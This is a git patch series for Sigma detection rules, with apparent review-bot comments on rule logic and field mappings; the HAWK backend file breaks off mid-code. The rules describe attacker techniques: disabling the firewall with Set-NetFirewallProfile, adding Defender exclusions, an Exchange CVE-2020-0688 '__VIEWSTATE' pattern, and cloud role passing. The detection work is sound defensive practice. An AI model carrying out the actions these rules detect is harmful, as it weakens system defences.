diff --git a/rules/windows/builtin/win_volume_shadow_copy_mount.yml b/rules/windows/builtin/win_volume_shadow_copy_mount.yml index 0efcb797..4d0d21f2 100644 --- a/rules/windows/builtin/win_volume_shadow_copy_mount.yml +++ b/rules/windows/builtin/win_volume_shadow_copy_mount.yml @@ -15,7 +15,7 @@ logsource: service: system detection: selection: - Provider Name: Microsoft-Windows-Ntfs + Provider_Name: Microsoft-Windows-Ntfs EventID: 98 DeviceName|contains: HarddiskVolumeShadowCopy condition: selection diff --git a/rules/windows/builtin/win_vul_cve_2020_0688.yml b/rules/windows/builtin/win_vul_cve_2020_0688.yml index 17ccba62..679f144f 100644 --- a/rules/windows/builtin/win_vul_cve_2020_0688.yml +++ b/rules/windows/builtin/win_vul_cve_2020_0688.yml @@ -17,7 +17,7 @@ logsource: detection: selection1: EventID: 4 - Provider Name: 'MSExchange Control Panel' + Provider_Name: 'MSExchange Control Panel' Level: Error selection2: - '&__VIEWSTATE=' diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index ce706fb3..c21d189e 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -108,7 +108,7 @@ fieldmappings: EventID: event.code Channel: winlog.channel #Keywords: from "Value" is lost with winlogbeat exist in nxlog - Provider Name: winlog.provider_name + Provider_Name: winlog.provider_name CallingProcessName: winlog.event_data.CallingProcessName ComputerName: winlog.ComputerName EventType: winlog.event_data.EventType From 7c01710d9d29e14789cda6945bf7314270f5a473 Mon Sep 17 00:00:00 2001 
From: Tran Trung Hieu Date: Wed, 13 Oct 2021 15:12:36 +0400 Subject: [PATCH 1214/1367] Change the service to the form service: azure._a_name_ and add falsepositives field --- rules/cloud/azure/azure_account_lockout.yml | 4 +++- rules/cloud/azure/azure_change_to_authentication_method.yml | 4 +++- rules/cloud/azure/azure_login_to_disabled_account.yml | 4 +++- rules/cloud/azure/azure_mfa_interrupted.yml | 4 +++- .../azure/azure_user_login_blocked_by_conditional_access.yml | 4 +++- 5 files changed, 15 insertions(+), 5 deletions(-) diff --git a/rules/cloud/azure/azure_account_lockout.yml b/rules/cloud/azure/azure_account_lockout.yml index 12ac7162..c2abe63c 100644 --- a/rules/cloud/azure/azure_account_lockout.yml +++ b/rules/cloud/azure/azure_account_lockout.yml @@ -7,12 +7,14 @@ description: Identifies user account which has been locked because the user trie references: - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts logsource: - service: SigninLogs + service: azure.signinlogs detection: selection: ResultType: 50053 condition: selection level: medium +falsepositives: + - Unknown tags: - attack.credential_access - attack.t1110 diff --git a/rules/cloud/azure/azure_change_to_authentication_method.yml b/rules/cloud/azure/azure_change_to_authentication_method.yml index 171932f3..a6d43f7d 100644 --- a/rules/cloud/azure/azure_change_to_authentication_method.yml +++ b/rules/cloud/azure/azure_change_to_authentication_method.yml @@ -7,7 +7,7 @@ description: Change to authentication method could be an indicated of an attacke references: - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts logsource: - service: AuditLogs + service: azure.auditlogs detection: selection: LoggedByService: 'Authentication Methods' 
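Review bot: The `falsepositives: Unknown` added to azure_account_lockout understates the obvious benign source of this event: the rule's own description (cut off in the hunk header) says the lock follows repeated wrong passwords, which ordinary users and stale credentials cached in scripts or mobile devices produce routinely. Suggest replacing `Unknown` with `- Users who repeatedly mistype their password` and `- Stale credentials stored in scripts, devices or service accounts`. To my recollection ResultType 50053 is also documented for sign-ins blocked because of a malicious source IP, not only lockouts; worth confirming against the Azure AD sign-in error list and noting in the description.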
@@ -15,5 +15,7 @@ detection: OperationName: 'User registered security info' condition: selection level: medium +falsepositives: + - Unknown tags: - attack.credential_access diff --git a/rules/cloud/azure/azure_login_to_disabled_account.yml b/rules/cloud/azure/azure_login_to_disabled_account.yml index a89c07d5..48a1b501 100644 --- a/rules/cloud/azure/azure_login_to_disabled_account.yml +++ b/rules/cloud/azure/azure_login_to_disabled_account.yml @@ -7,13 +7,15 @@ description: Detect failed attempts to sign in to disabled accounts. references: - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts logsource: - service: SigninLogs + service: azure.signinlogs detection: selection: ResultType: 50057 ResultDescription: 'User account is disabled. The account has been disabled by an administrator.' condition: selection level: medium +falsepositives: + - Unknown tags: - attack.initial_access - attack.t1078 diff --git a/rules/cloud/azure/azure_mfa_interrupted.yml b/rules/cloud/azure/azure_mfa_interrupted.yml index 2f381252..22d5e37c 100644 --- a/rules/cloud/azure/azure_mfa_interrupted.yml +++ b/rules/cloud/azure/azure_mfa_interrupted.yml @@ -7,7 +7,7 @@ description: Identifies user login with multifactor authentication failures, whi references: - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts logsource: - service: SigninLogs + service: azure.signinlogs detection: selection: ResultType: 50074 @@ -17,6 +17,8 @@ detection: ResultDescription|contains: 'Authentication failed during strong authentication request' condition: selection or selection1 level: medium +falsepositives: + - Unknown tags: - attack.initial_access - attack.t1078.004 diff --git a/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml b/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml index 3ac01e8c..9dff5f2d 100644 
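Review bot: The exact `ResultDescription` match in azure_login_to_disabled_account ties the rule to the full English wording of a Microsoft status text, while `ResultType: 50057` on the line above already identifies the disabled-account failure; any rewording or localisation of the message silently breaks the rule. Suggest dropping the `ResultDescription` line, or loosening it to `ResultDescription|contains: 'account is disabled'`. The new `falsepositives: Unknown` could also name the realistic benign case, e.g. `- Users trying to sign in after their account was deliberately disabled during offboarding`.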
--- a/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml
+++ b/rules/cloud/azure/azure_user_login_blocked_by_conditional_access.yml
@@ -7,12 +7,14 @@ description: Detect access has been blocked by Conditional Access policies. The
 references:
 - https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts
 logsource:
- service: SigninLogs
+ service: azure.signinlogs
 detection:
 selection:
 ResultType: 53003
 condition: selection
 level: medium
+falsepositives:
+ - Unknown
 tags:
 - attack.credential_access
 - attack.t1110
From 010b0e28686250ad3760423ab209c51c0afbdb77 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Wed, 13 Oct 2021 06:58:57 -0500
Subject: [PATCH 1215/1367] Update passed_role_to_glue_development_endpoint.yml
---
 rules/cloud/aws/passed_role_to_glue_development_endpoint.yml | 5 +----
 1 file changed, 1 insertion(+), 4 deletions(-)
diff --git a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml
index dfc15fc6..d22ebd8b 100644
--- a/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml
+++ b/rules/cloud/aws/passed_role_to_glue_development_endpoint.yml
@@ -11,12 +11,9 @@ logsource:
 service: cloudtrail
 detection:
 selection1:
- eventSource: lambda.amazonaws.com
- eventName: PassRole
- selection2:
 eventSource: glue.amazonaws.com
 eventName: CreateDevEndpoint
- condition: selection1 and selection2
+ condition: selection1
 level: low
 tags:
 - attack.privilege_escalation
From e08f6333b810eff9a50a5a2ff8e49be0ed8591bb Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Wed, 13 Oct 2021 06:59:13 -0500
Subject: [PATCH 1216/1367] Update aws_pass_role_to_lambda_function.yml
---
 rules/cloud/aws/aws_pass_role_to_lambda_function.yml | 7 ++-----
 1 file changed, 2 insertions(+), 5 deletions(-)
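Review bot: With the lambda/PassRole selection gone, the glue rule now alerts on every `CreateDevEndpoint` call, yet nothing left in `selection1` relates to a role, while the file name (and presumably the title, outside the hunk) still promises a "passed role" detection. If the intent is to catch a role being handed to the dev endpoint, the CloudTrail record for this API should carry it under `requestParameters.roleArn` (confirm the exact key in a sample event), so adding `requestParameters.roleArn|contains: ':role/'` to `selection1` keeps the rule on topic; otherwise the title and description should say the rule flags dev-endpoint creation in general. The removed AND between two different `eventName` values could never match on a single CloudTrail record, so removing it was the right call.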
diff --git a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml
index 3c38c959..f8047050 100644
--- a/rules/cloud/aws/aws_pass_role_to_lambda_function.yml
+++ b/rules/cloud/aws/aws_pass_role_to_lambda_function.yml
@@ -10,15 +10,12 @@ logsource:
 service: cloudtrail
 detection:
 selection1:
- eventSource: iam.amazonaws.com
- eventName: PassRole
- selection2:
 eventSource: lambda.amazonaws.com
 eventName: CreateFunction
- selection3:
+ selection2:
 eventSource: lambda.amazonaws.com
 eventName: InvokeFunction
- condition: selection1 and selection2 and selection3
+ condition: selection1 and selection2
 level: low
 tags:
 - attack.privilege_escalation
From 4e43fce6297692f0b17b0bedcab56d9540029b29 Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Wed, 13 Oct 2021 07:01:04 -0500
Subject: [PATCH 1217/1367] Update powershell_windows_firewall_profile_disabled.yml
---
 .../powershell_windows_firewall_profile_disabled.yml | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml b/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml
index 3d3a596b..eb7f1ed0 100644
--- a/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml
+++ b/rules/windows/powershell/powershell_script/powershell_windows_firewall_profile_disabled.yml
@@ -14,7 +14,8 @@ logsource:
 service: powershell
 detection:
 selection:
- CommandLine|contains|all:
+ EventID: 4104
+ ScriptBlockText|contains|all:
 - Set-NetFirewallProfile
 - -Profile
 - -Enabled
From 756d5b5aa6ddbb17ab689951b9e7911e107dfe4c Mon Sep 17 00:00:00 2001
From: Austin Songer
Date: Wed, 13 Oct 2021 07:02:01 -0500
Subject: [PATCH 1218/1367] Update onelogin_user_account_locked.yml
---
 rules/cloud/onelogin/onelogin_user_account_locked.yml | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
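Review bot: `condition: selection1 and selection2` in aws_pass_role_to_lambda_function still ANDs `eventName: CreateFunction` with `eventName: InvokeFunction`, which a single CloudTrail record can never satisfy, so the rule keeps the same unsatisfiable shape the commit just removed for the PassRole selection and will never fire. Change it to `condition: 1 of selection*` (or `selection1 or selection2`); if the two calls are meant to be correlated in sequence, say so in the description and leave the sequencing to the SIEM. InvokeFunction is, to my knowledge, a Lambda data event that a management-only trail does not record, so selection2 probably deserves a caveat in the description as well.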
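Review bot: The new `ScriptBlockText|contains|all` list in powershell_windows_firewall_profile_disabled matches `-Enabled` without a value, so `Set-NetFirewallProfile -Profile Domain -Enabled True` (re-enabling the firewall) raises the same alert as disabling it, contrary to the rule's name. Replacing the last term with `- '-Enabled False'` pins the rule to the disabling case; the `-Enabled:$false` spelling would then need a second selection if you want it covered. The list may continue past the end of the hunk, so check whether a value term already follows before changing it.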
diff --git a/rules/cloud/onelogin/onelogin_user_account_locked.yml b/rules/cloud/onelogin/onelogin_user_account_locked.yml index 32225dc0..d43ddf3b 100644 --- a/rules/cloud/onelogin/onelogin_user_account_locked.yml +++ b/rules/cloud/onelogin/onelogin_user_account_locked.yml @@ -11,14 +11,14 @@ logsource: service: onelogin.events detection: selection1: # Locked via API - eventtypeid: 532 + event_type_id: 532 selection2: # Locked via API - eventtypeid: 553 + event_type_id: 553 selection3: # Suspended via API - eventtypeid: 551 + event_type_id: 551 condition: 1 of them level: low tags: - attack.impact falsepositives: - - System may lock or suspend user accounts. \ No newline at end of file + - System may lock or suspend user accounts. From 5c3cdbe845a3b54e1b2a982cebb7de307694443b Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 13 Oct 2021 14:20:26 +0200 Subject: [PATCH 1219/1367] fix: replace space with _ --- rules/windows/other/win_defender_amsi_trigger.yml | 4 ++-- rules/windows/other/win_defender_exclusions.yml | 4 ++-- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/rules/windows/other/win_defender_amsi_trigger.yml b/rules/windows/other/win_defender_amsi_trigger.yml index 2478a55c..a4ee7b2d 100644 --- a/rules/windows/other/win_defender_amsi_trigger.yml +++ b/rules/windows/other/win_defender_amsi_trigger.yml @@ -13,11 +13,11 @@ logsource: detection: selection: EventID: 1116 - Source Name: 'AMSI' + Source_Name: 'AMSI' condition: selection falsepositives: - unlikely level: high tags: - attack.execution - - attack.t1059 \ No newline at end of file + - attack.t1059 diff --git a/rules/windows/other/win_defender_exclusions.yml b/rules/windows/other/win_defender_exclusions.yml index 3862ad15..517e3009 100644 --- a/rules/windows/other/win_defender_exclusions.yml +++ b/rules/windows/other/win_defender_exclusions.yml 
@@ -17,8 +17,8 @@ logsource: detection: selection1: EventID: 5007 - New Value|contains: '\Microsoft\Windows Defender\Exclusions' + New_Value|contains: '\Microsoft\Windows Defender\Exclusions' condition: selection1 falsepositives: - Administrator actions -level: medium \ No newline at end of file +level: medium From 9ddabe18ed16d4da04ea070db9166842e3b8b2fd Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 13 Oct 2021 14:21:23 +0200 Subject: [PATCH 1220/1367] feat: testing for space in field names --- tests/test_rules.py | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) diff --git a/tests/test_rules.py b/tests/test_rules.py index 3354ba87..2e6e0769 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -154,6 +154,24 @@ class TestRules(unittest.TestCase): self.assertEqual(files_with_duplicate_filters, [], Fore.RED + "There are rules with duplicate filters") + def test_field_name_with_space(self): + def key_iterator(fields, faulty): + for key, value in fields.items(): + if " " in key: + faulty.append(key) + print(Fore.YELLOW + "Rule {} has a space in field name ({}).".format(file, key)) + if type(value) == dict: + key_iterator(value, faulty) + + faulty_fieldnames = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + yaml = self.get_rule_yaml(file_path = file) + detection = self.get_rule_part(file_path = file, part_name = "detection") + key_iterator(detection, faulty_fieldnames) + + self.assertEqual(faulty_fieldnames, [], Fore.RED + + "There are rules with an unsupported field name. Spaces are not allowed. (Replace space with an underscore character if the log source uses space)") + def test_single_named_condition_with_x_of_them(self): faulty_detections = [] From 7c8a7358823494a751bdc4442259b5bd4cb27192 Mon Sep 17 00:00:00 2001 
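Review bot: `key_iterator` in test_field_name_with_space only descends into dict values, so field names inside a selection written as a list of maps (`selection: - Field A: x`) are never inspected and the test passes while such a rule still carries a space in a field name. Recursing into list items that are dicts closes the gap, and `isinstance` is the idiomatic check instead of `type(value) == dict`. The `yaml = self.get_rule_yaml(...)` result is never used and can be dropped. The per-rule loop and the final `assertEqual` are unchanged.
```python
def key_iterator(fields, faulty):
    for key, value in fields.items():
        if " " in key:
            faulty.append(key)
            print(Fore.YELLOW + "Rule {} has a space in field name ({}).".format(file, key))
        if isinstance(value, dict):
            key_iterator(value, faulty)
        elif isinstance(value, list):
            # a selection may be a list of maps; their keys are field names too
            for item in value:
                if isinstance(item, dict):
                    key_iterator(item, faulty)
# … unchanged: per-rule loop and assertEqual …
```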
From: phantinuss Date: Wed, 13 Oct 2021 14:22:48 +0200 Subject: [PATCH 1221/1367] fix: change modifed date --- rules/windows/other/win_defender_amsi_trigger.yml | 2 +- rules/windows/other/win_defender_exclusions.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/rules/windows/other/win_defender_amsi_trigger.yml b/rules/windows/other/win_defender_amsi_trigger.yml index a4ee7b2d..7dadd113 100644 --- a/rules/windows/other/win_defender_amsi_trigger.yml +++ b/rules/windows/other/win_defender_amsi_trigger.yml @@ -2,7 +2,7 @@ title: Windows Defender AMSI Trigger Detected id: ea9bf0fa-edec-4fb8-8b78-b119f2528186 description: Detects triggering of AMSI by Windows Defender. date: 2020/09/14 -modified: 2021/08/06 +modified: 2021/10/13 author: Bhabesh Raj references: - https://docs.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps diff --git a/rules/windows/other/win_defender_exclusions.yml b/rules/windows/other/win_defender_exclusions.yml index 517e3009..3f31c3b6 100644 --- a/rules/windows/other/win_defender_exclusions.yml +++ b/rules/windows/other/win_defender_exclusions.yml @@ -2,7 +2,7 @@ title: Windows Defender Exclusions Added id: 1321dc4e-a1fe-481d-a016-52c45f0c8b4f description: Detects the Setting of Windows Defender Exclusions date: 2021/07/06 -modified: 2021/09/21 +modified: 2021/10/13 author: Christian Burkard references: - https://twitter.com/_nullbind/status/1204923340810543109 From 81b4a0eb982beca21639d5ee72721123042b9914 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 13 Oct 2021 14:36:10 +0200 Subject: [PATCH 1222/1367] feat: adapt logsources for field names without spaces --- tools/config/arcsight-zeek.yml | 4 +- tools/config/ecs-proxy.yml | 2 +- tools/config/ecs-zeek-corelight.yml | 4 +- tools/config/humio.yml | 4 +- tools/config/logstash-zeek-default-json.yml | 4 +- tools/config/splunk-zeek.yml | 4 +- tools/config/winlogbeat-modules-enabled.yml | 70 ++++++++++----------- 7 files changed, 46 insertions(+), 46 deletions(-) 
diff --git a/tools/config/arcsight-zeek.yml b/tools/config/arcsight-zeek.yml index a9272cc2..097c8b21 100644 --- a/tools/config/arcsight-zeek.yml +++ b/tools/config/arcsight-zeek.yml @@ -1103,7 +1103,7 @@ fieldmappings: # - url.registered_domain # - destination.registered_domain post_url_parameter: requestUrl - Request Url: requestUrl + Request_Url: requestUrl request_url: requestUrl request_URL: requestUrl RequestUrl: requestUrl @@ -1149,7 +1149,7 @@ fieldmappings: UserAgent: - deviceCustomString5 - requestClientApplication - User Agent: + User_Agent: - deviceCustomString5 - requestClientApplication web_dest: destinationHostName diff --git a/tools/config/ecs-proxy.yml b/tools/config/ecs-proxy.yml index eabb3c52..a32aa063 100644 --- a/tools/config/ecs-proxy.yml +++ b/tools/config/ecs-proxy.yml @@ -119,7 +119,7 @@ fieldmappings: - url.registered_domain - destination.registered_domain post_url_parameter: url.original - Request Url: url.original + Request_Url: url.original request_url: url.original request_URL: url.original RequestUrl: url.original diff --git a/tools/config/ecs-zeek-corelight.yml b/tools/config/ecs-zeek-corelight.yml index 8fd59d94..f1868e0f 100644 --- a/tools/config/ecs-zeek-corelight.yml +++ b/tools/config/ecs-zeek-corelight.yml @@ -1226,7 +1226,7 @@ fieldmappings: # - url.registered_domain # - destination.registered_domain post_url_parameter: url.original - Request Url: url.original + Request_Url: url.original request_url: url.original request_URL: url.original RequestUrl: url.original @@ -1262,7 +1262,7 @@ fieldmappings: User-Agent: user_agent.original useragent: user_agent.original UserAgent: user_agent.original - User Agent: user_agent.original + User_Agent: user_agent.original web_dest: - url.domain - destination.domain diff --git a/tools/config/humio.yml b/tools/config/humio.yml index dce843f8..a4b6d217 100644 --- a/tools/config/humio.yml +++ b/tools/config/humio.yml 
@@ -511,7 +511,7 @@ fieldmappings: product=zeek: uri post_url_parameter: product=zeek: uri - Request Url: + Request_Url: product=zeek: uri request_url: product=zeek: uri @@ -567,7 +567,7 @@ fieldmappings: product=zeek: user_agent UserAgent: product=zeek: user_agent - User Agent: + User_Agent: product=zeek: user_agent web_dest: product=zeek: host diff --git a/tools/config/logstash-zeek-default-json.yml b/tools/config/logstash-zeek-default-json.yml index c4332f32..7b9da224 100644 --- a/tools/config/logstash-zeek-default-json.yml +++ b/tools/config/logstash-zeek-default-json.yml @@ -400,7 +400,7 @@ fieldmappings: in_url: uri # parent_domain: # Not in open source zeek post_url_parameter: uri - Request Url: uri + Request_Url: uri request_url: uri request_URL: uri RequestUrl: uri @@ -433,7 +433,7 @@ fieldmappings: User-Agent: user_agent useragent: user_agent UserAgent: user_agent - User Agent: user_agent + User_Agent: user_agent web_dest: - host - query diff --git a/tools/config/splunk-zeek.yml b/tools/config/splunk-zeek.yml index 1cefcca7..087d5a99 100644 --- a/tools/config/splunk-zeek.yml +++ b/tools/config/splunk-zeek.yml @@ -392,7 +392,7 @@ fieldmappings: in_url: uri # parent_domain: # Not in open source zeek post_url_parameter: uri - Request Url: uri + Request_Url: uri request_url: uri request_URL: uri RequestUrl: uri @@ -425,7 +425,7 @@ fieldmappings: User-Agent: user_agent useragent: user_agent UserAgent: user_agent - User Agent: user_agent + User_Agent: user_agent web_dest: - host - query diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index c21d189e..99c98191 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml 
@@ -503,40 +503,40 @@ fieldmappings: # # Microsoft-Windows-Windows Defender/Operational # - Action ID: winlog.event_data.Action\ ID - Action Name: winlog.event_data.Action\ Name - Additional Actions ID: winlog.event_data.Additional\ Actions\ ID - Additional Actions String: winlog.event_data.Additional\ Actions\ String - Category ID: winlog.event_data.Category\ ID - Category Name: winlog.event_data.Category\ Name - Detection ID: winlog.event_data.Detection\ ID - Detection Time: winlog.event_data.Detection\ Time - Detection User: winlog.event_data.Detection\ User - Engine Version: winlog.event_data.Engine\ Version - Error Code: winlog.event_data.Error\ Code - Error Description: winlog.event_data.Error\ Description - Execution ID: winlog.event_data.Execution\ ID - Execution Name: winlog.event_data.Execution\ Name + Action_ID: winlog.event_data.Action\ ID + Action_Name: winlog.event_data.Action\ Name + Additional_Actions_ID: winlog.event_data.Additional\ Actions\ ID + Additional_Actions_String: winlog.event_data.Additional\ Actions\ String + Category_ID: winlog.event_data.Category\ ID + Category_Name: winlog.event_data.Category\ Name + Detection_ID: winlog.event_data.Detection\ ID + Detection_Time: winlog.event_data.Detection\ Time + Detection_User: winlog.event_data.Detection\ User + Engine_Version: winlog.event_data.Engine\ Version + Error_Code: winlog.event_data.Error\ Code + Error_Description: winlog.event_data.Error\ Description + Execution_ID: winlog.event_data.Execution\ ID + Execution_Name: winlog.event_data.Execution\ Name FWLink: winlog.event_data.FWLink - New Value: winlog.event_data.New\ Value - Old Value: winlog.event_data.Old\ Value - Origin ID: winlog.event_data.Origin\ ID - Origin Name: winlog.event_data.Origin\ Name + New_Value: winlog.event_data.New\ Value + Old_Value: winlog.event_data.Old\ Value + Origin_ID: winlog.event_data.Origin\ ID + Origin_Name: winlog.event_data.Origin\ Name Path: winlog.event_data.Path - Post Clean Status: 
winlog.event_data.Post\ Clean\ Status - Pre Execution Status: winlog.event_data.Pre\ Execution\ Status - Process Name: winlog.event_data.Process\ Name - Product Name: winlog.event_data.Product\ Name - Product Version: winlog.event_data.Product\ Version - Remediation User: winlog.event_data.Remediation\ User - Security intelligence Version: winlog.event_data.Security\ intelligence\ Version - Severity ID: winlog.event_data.Severity\ ID - Severity Name: winlog.event_data.Severity\ Name - Source ID: winlog.event_data.Source\ ID - Source Name: winlog.event_data.Source\ Name - Status Code: winlog.event_data.Status\ Code - Status Description: winlog.event_data.Status\ Description - Threat ID: winlog.event_data.Threat\ ID - Threat Name: winlog.event_data.Threat\ Name - Type ID: winlog.event_data.Type\ ID - Type Name: winlog.event_data.Type\ Name + Post_Clean_Status: winlog.event_data.Post\ Clean\ Status + Pre_Execution_Status: winlog.event_data.Pre\ Execution\ Status + Process_Name: winlog.event_data.Process\ Name + Product_Name: winlog.event_data.Product\ Name + Product_Version: winlog.event_data.Product\ Version + Remediation_User: winlog.event_data.Remediation\ User + Security_intelligence_Version: winlog.event_data.Security\ intelligence\ Version + Severity_ID: winlog.event_data.Severity\ ID + Severity_Name: winlog.event_data.Severity\ Name + Source_ID: winlog.event_data.Source\ ID + Source_Name: winlog.event_data.Source\ Name + Status_Code: winlog.event_data.Status\ Code + Status_Description: winlog.event_data.Status\ Description + Threat_ID: winlog.event_data.Threat\ ID + Threat_Name: winlog.event_data.Threat\ Name + Type_ID: winlog.event_data.Type\ ID + Type_Name: winlog.event_data.Type\ Name From 1f5d9d8adc8339c7b4303ea15442a3a46fcfe510 Mon Sep 17 00:00:00 2001 
From: Tim Shelton Date: Wed, 13 Oct 2021 14:36:49 +0000 Subject: [PATCH 1223/1367] Initial commmit of hawk analytic score generator --- tools/config/hawk.yml | 99 +++++++++ tools/sigma/backends/hawk.py | 415 +++++++++++++++++++++++++++++++++++ 2 files changed, 514 insertions(+) create mode 100644 tools/config/hawk.yml create mode 100644 tools/sigma/backends/hawk.py diff --git a/tools/config/hawk.yml b/tools/config/hawk.yml new file mode 100644 index 00000000..5caf6ede --- /dev/null +++ b/tools/config/hawk.yml 
@@ -0,0 +1,99 @@ +title: HAWK +order: 20 +backends: + - hawk +fieldmappings: + dst: + - ip_dst_host + dst_ip: + - ip_dst + src: + - ip_src_host + src_ip: + - ip_src + category: vendor_category + error: error_code + key: event_key + payload: event_payload + weight: event_weight + account type: account_type + PrivilegeList: process_privileges + pid_user: event_username + sid: correlation_session_id + UserSid: correlation_session_id + TargetSid: target_session_id + TargetUserName: target_username + SamAccountName: target_username + AccountName: target_username + TargetDomainName: target_domain + DnsServerIpAddress: dns_address + QueryName: hostname_dst + AuthenticationPackageName: package_name + HostProcess: image + Application: image + ProcessName: image + TargetImage: target_image + Parent Image: parent_image + ParentImage: parent_image + Caller Process Name: parent_image + CallerProcessName: parent_image + ParentProcessName: parent_image + CommandLine: command + ProcessCommandLine: command + ParentCommandLine: parent_command + IMPHASH: file_hash_imphash + SHA256: file_hash_sha256 + MD5: file_hash_md5 + SHA1: file_hash_sha1 + SubjectUserSid: correlation_session_id + SubjectSid: correlation_session_id + SubjectUserName: correlation_username + SubjectDomainName: correlation_domain + SubjectLogonId: correlation_logon_id + pid: event_pid + ProccessId: pid + NewProcessName: image + ServiceName: service_name + Service: service_name + ServiceFileName: filename + TargetObject: target_object + EventID: vendor_id + SourceImage: parent_image + Description: image_description + Product: image_product + Company: image_company + CurrentDirectory: path + ShareName: path + RelativeTargetName: filename + TargetName: value + Initiated: value + Accesses: access_mask + LDAPDisplayName: distinguished_name + AttributeLDAPDisplayName: distinguished_name + AttributeValue: value + ParentProcessId: parent_pid + SourceProcessId: source_pid + TargetProcessId: target_pid + Signed: signature + 
Status: value + TargetFilename: filename + TargetObject: object + ObjectClass: object_type + ObjectValueName: object_name + DeviceClassName: object_name + Details: object_target + CallTrace: calltrace + IpAddress: ip_src + DCIPAddress: ip_src + WorkstationName: hostname_src + Workstation: hostname_src + DestinationIp: ip_dst + DestinationHostname: hostname_dst + DestinationPort: ip_dport + GrantedAccess: access_mask + StartModule: target_process_name + TargetProcessAddress: process_address + TicketOptions: sys.ticket.options + TicketEncryptionType: sys.ticket.encryption.type + DetectionSource: value + Priority: event_priority diff --git a/tools/sigma/backends/hawk.py b/tools/sigma/backends/hawk.py new file mode 100644 index 00000000..b2a775be --- /dev/null +++ b/tools/sigma/backends/hawk.py 
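Review bot: `TargetObject` is mapped twice in the new fieldmappings (`TargetObject: target_object` near the top and `TargetObject: object` further down), so one entry is dead: a plain YAML loader keeps whichever comes last and a strict loader may reject the duplicate key outright, which makes the field the backend emits for TargetObject depend on the loader rather than on the config; keep the intended mapping and drop the other. `ProccessId: pid` looks like a misspelling of ProcessId, and it maps to `pid` while the `pid` entry a few lines above maps to `event_pid`, so the two process-id keys disagree. Several keys still contain spaces (`account type`, `Parent Image`, `Caller Process Name`) even though the other configs in this series are being converted to underscore names and tests/test_rules.py rejects spaces in rule field names, so those entries appear unreachable from any rule that passes the test suite.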
@@ -0,0 +1,415 @@ +# Output backends for sigmac - HAWK.io + + +import re +import sigma +import json +import uuid +from sigma.parser.modifiers.base import SigmaTypeModifier +from sigma.parser.modifiers.type import SigmaRegularExpressionModifier +from .base import SingleTextQueryBackend +from .mixins import MultiRuleOutputMixin + + +class HAWKBackend(SingleTextQueryBackend): + """Converts Sigma rule into HAWK search""" + identifier = "hawk" + active = True + config_required = False + default_config = ["sysmon", "hawk"] + reEscape = re.compile('(")') + reClear = None + andToken = " , " + orToken = " , " + subExpression = "{\"id\": \"and\", \"key\": \"And\", \"children\": [%s] }" + listExpression = "%s" + listSeparator = " " + valueExpression = "%s" + keyExpression = "%s" + nullExpression = "%s = null" + notNullExpression = "%s != null" + mapExpression = "%s=%s" + mapListsSpecialHandling = True + aql_database = "events" + + def cleanKey(self, key): + if key == None: + return "" + return self.sigmaparser.config.get_fieldmapping(key).resolve_fieldname(key, self.sigmaparser) + + def cleanValue(self, value): + """Remove quotes in text""" + # return value.replace("\'","\\\'") + return value + + def generateNode(self, node, notNode=False): + #print(type(node)) + #print(node) + if type(node) == sigma.parser.condition.ConditionAND: + return self.generateANDNode(node) + elif type(node) == sigma.parser.condition.ConditionOR: + #print("OR NODE") + #print(node) + return self.generateORNode(node) + elif type(node) == sigma.parser.condition.ConditionNOT: + #print("NOT NODE") + #print(node) + return self.generateNOTNode(node) + elif type(node) == sigma.parser.condition.ConditionNULLValue: + return self.generateNULLValueNode(node) + elif type(node) == sigma.parser.condition.ConditionNotNULLValue: + return self.generateNotNULLValueNode(node) + elif type(node) == sigma.parser.condition.NodeSubexpression: + #print(node) + return self.generateSubexpressionNode(node) + elif type(node) == 
